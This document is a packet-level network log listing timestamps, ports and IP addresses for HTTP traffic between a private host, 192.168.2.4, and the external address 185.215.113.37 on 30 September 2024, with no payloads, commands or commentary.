Sep 30, 2024 07:08:10.205444098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205455065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205460072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205471992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205485106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205501080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205580950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205596924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205610991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205626011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205626011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205636024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205658913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205674887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205704927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205720901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205734015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205748081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205751896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205763102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205774069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205779076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205794096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205795050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205806017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205810070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205825090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205827951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205840111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205846071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205856085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205863953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205879927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205899954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.205934048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.205981970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206052065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206065893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206080914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206094980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206103086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206103086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206110001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206121922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206126928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206140995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206156969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206166983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206197977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206212997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206228018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206239939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206243992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206259966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206264019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206273079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206274986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.206285000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206305981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.206319094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.289973021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290097952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290143967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290158033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290173054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290195942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290196896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290214062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290224075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290229082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290242910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290257931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290275097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290275097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290288925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290292978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290307045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290322065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290323019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290335894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290354967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290360928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290374994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290378094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290393114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290407896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290410995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290422916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290431976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290460110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290468931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290472984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290488005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290502071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290508032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290525913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290527105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290544033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290556908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290558100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290570974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290596962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290606976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290621042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290636063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290649891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290652037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290668964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290682077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290683985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290714025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290733099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290774107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290787935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290802002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290815115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290828943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290832043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290849924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290853024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290864944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290872097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290880919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290896893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290898085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290911913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290913105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290931940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290932894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.290946960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290966988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290978909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.290999889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291013956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291028976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291049957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291054010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291079044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291102886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291104078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291117907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291132927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291146994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291152954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291162968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291173935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291178942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291193008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291220903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291233063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291246891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291261911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291275978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291279078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291290045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291307926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291337013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291356087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291409969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291415930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291424990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291470051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291548014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291563988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291578054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291591883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291605949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291609049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291621923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291649103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291670084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291685104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291701078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291714907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291722059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291738987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291744947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291754007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.291776896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.291800976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.379322052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.384263992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.600820065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.600838900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.600967884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601161957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601175070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601186991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601227999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601268053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601279974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601300001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601310015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601310015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601321936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601327896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601335049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601361990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601370096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601372957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601387024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601392984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601423979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601434946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601449966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601480961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601491928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601502895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601510048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601545095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601574898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601587057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601598978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601609945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601619005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601624012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601648092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601677895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601684093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601689100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601713896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601722956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601727009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601738930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601761103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601799965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601855993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601866961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601876974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601887941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601897955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601907015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601941109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.601980925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601990938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.601999998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.602011919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.602025986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.602029085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.602035999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.602076054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.602077007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.602087021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.602125883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.610657930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610677004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610690117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610738039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610747099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610758066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.610764980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610826015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.610855103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610866070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610876083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610887051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610897064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610908031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.610908985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.610938072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.610955000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611120939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611133099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611143112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611152887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611164093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611174107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611183882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611186981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611196041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611207962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611217976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611218929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611248016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611274004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611274958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611294985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611305952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611335039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611355066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611582041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611593008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611603022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611613989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611624002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611634016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611644983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611666918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611677885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611685991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611690044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611702919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611712933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611716032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611725092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611737013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611742973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611748934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611753941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611763954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611773968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611774921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611788034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611799002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.611807108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611844063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.611854076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612000942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612051010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612227917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612240076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612250090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612261057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612272978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612282991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612287998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612298965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612309933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612319946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612330914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612333059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612343073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612354040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612361908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612365961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612376928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612387896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612397909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612401009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612410069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612417936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:10.612421036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:10.612432957 CEST	80	49730	185.215.113.37	192.168.2.4
